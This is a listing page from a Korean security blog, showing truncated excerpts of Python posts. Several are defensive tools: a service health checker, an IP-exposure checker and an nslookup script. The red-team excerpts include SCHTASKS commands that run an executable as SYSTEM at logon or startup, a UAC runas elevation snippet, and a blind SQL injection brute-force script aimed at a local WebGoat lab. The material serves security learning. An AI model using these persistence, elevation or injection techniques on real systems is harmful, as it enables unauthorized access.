'🤖정보보안' 카테고리의 글 목록 (4 Page)

[파이썬] 권한 상승 명령어(간단 최종)

2022.07.01

해당 파이썬 함수로 아래와 같이 최고 권한의 프로그램 실행을 할 수 있다. os.system(f'SCHTASKS /Create /TN {SVC_NAME} /SC ONLOGON /TR {SVC_PROG_PATH} /RL HIGHEST') 또는 일반 명령어로 SCHTASKS /Create /TN "Go" /SC ONSTART /TR "C:\Users\AidenLee\Downloads\go.exe" /RL HIGHEST /RU "SYSTEM" 응용 os.system()을 사용하여 Windows에서 권한 상승을 요청하는 방법 중 하나는 작업 스케줄러(Task Scheduler)를 사용하는 것입니다. 이미 사용하고 계신 SCHTASKS 명령은 이 방법 중 하나입니다. 아래는 다른 몇 가지 방법을 제공합니다. ru..

🤖정보보안/❤️레드팀

[파이썬] 권한 상승 요청 코드(2022 최신)

2022.07.01

온라인에서 발견되는 기존 파이썬 권한 상승 요청 코드의 경우 패키지 이름이 win32com에서 shell을 요청하지만 2022년 기준 win32comext에 존재한다. import os import sys # win32com.shell이 아닌 win32comext 이다 from win32comext.shell import shell ASADMIN = 'asadmin' print(sys.argv) if sys.argv[-1] != ASADMIN: script = os.path.abspath(sys.argv[0]) params = ' '.join([script] + sys.argv[1:] + [ASADMIN]) shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.execut..

🤖정보보안/💙블루팀

[파이썬] 대외 서비스 실행 유무 체크 프로그램(메일보고 기능)

2021.04.26

대외로 서비스되는 홈페이지의 다운 여부 및 접근 불가 상태를 판별해주는 프로그램이다. 실행 후 메일 발송하는 기능까지 있다. 메일 본문은 OX 상태유무만 날라간다. 서비스 스케줄러로 등록하여 헬스체크를 할 수 있다. 대외서비스 대상이므로 회사 내부망에서 실행하면 결과값이 달라진다. 회사내부망에서 VPN 사이트에 접속하려고 한다던가 그러면 상태는 X가 뜰 수도 있다. 외부사이트 접근제한이 되면 X가 뜰 수도 있다. import sys from PyQt5.QtWidgets import (QApplication, QWidget, QGridLayout, QLabel, QLineEdit, QTextEdit) import requests as r import socket import smtplib r.package..

🤖정보보안/💙블루팀

[파이썬] 웹서비스 IP 접근 노출 확인 소스코드(보안정책)

2021.04.20

IP로 서비스를 접근하였을때 접근 가능한 것을 취약으로 판단하는 분류 소스코드이다. 점검 결과는 Excel로 확인 가능하다 사이트에 직접 접근하여 확인해야하는 수동점검 항목이 있다. 콘솔&엑셀 버전 import requests from openpyxl import Workbook requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) class bcolors: HEADER = "\033[95m" OKBLUE = "\033[94m" OKCYAN = "\033[96m" OKGREEN = "\033[92m" WARNING = "\033[93m" FAIL = "\033[91m" EN..

🤖정보보안/💙블루팀

[파이썬3.x] nslookup 자동화 툴

2020.05.21

import os import socket from urllib.parse import urlparse def nslookup(DOMAIN): try: ip_list = [] ais = socket.getaddrinfo(DOMAIN, 0, 0, 0, 0) for result in ais: ip_list.append(result[-1][0]) ip_list = list(set(ip_list)) return (',').join(ip_list) except: return "N/A" def getDomain(PATH, FNAME): # print PATH + '\\' + FNAME with open(PATH + '\\' + FNAME, 'r') as f: maldomain = f.readlines() if le..

🤖정보보안/❤️레드팀

[파이썬] WebGoat Brute Force 파이썬 코드

2019.04.28

import requests password = str() cre = "created" url = "http://localhost:8080/WebGoat/SqlInjection/challenge" cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'} print ('[*] Get password length...') password_length = int() for length in range(1,30): datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'conf..

[파이썬] 권한 상승 명령어(간단 최종)

[파이썬] 권한 상승 요청 코드(2022 최신)

[파이썬] 대외 서비스 실행 유무 체크 프로그램(메일보고 기능)

[파이썬] 웹서비스 IP 접근 노출 확인 소스코드(보안정책)

[파이썬3.x] nslookup 자동화 툴

[파이썬] WebGoat Brute Force 파이썬 코드

티스토리툴바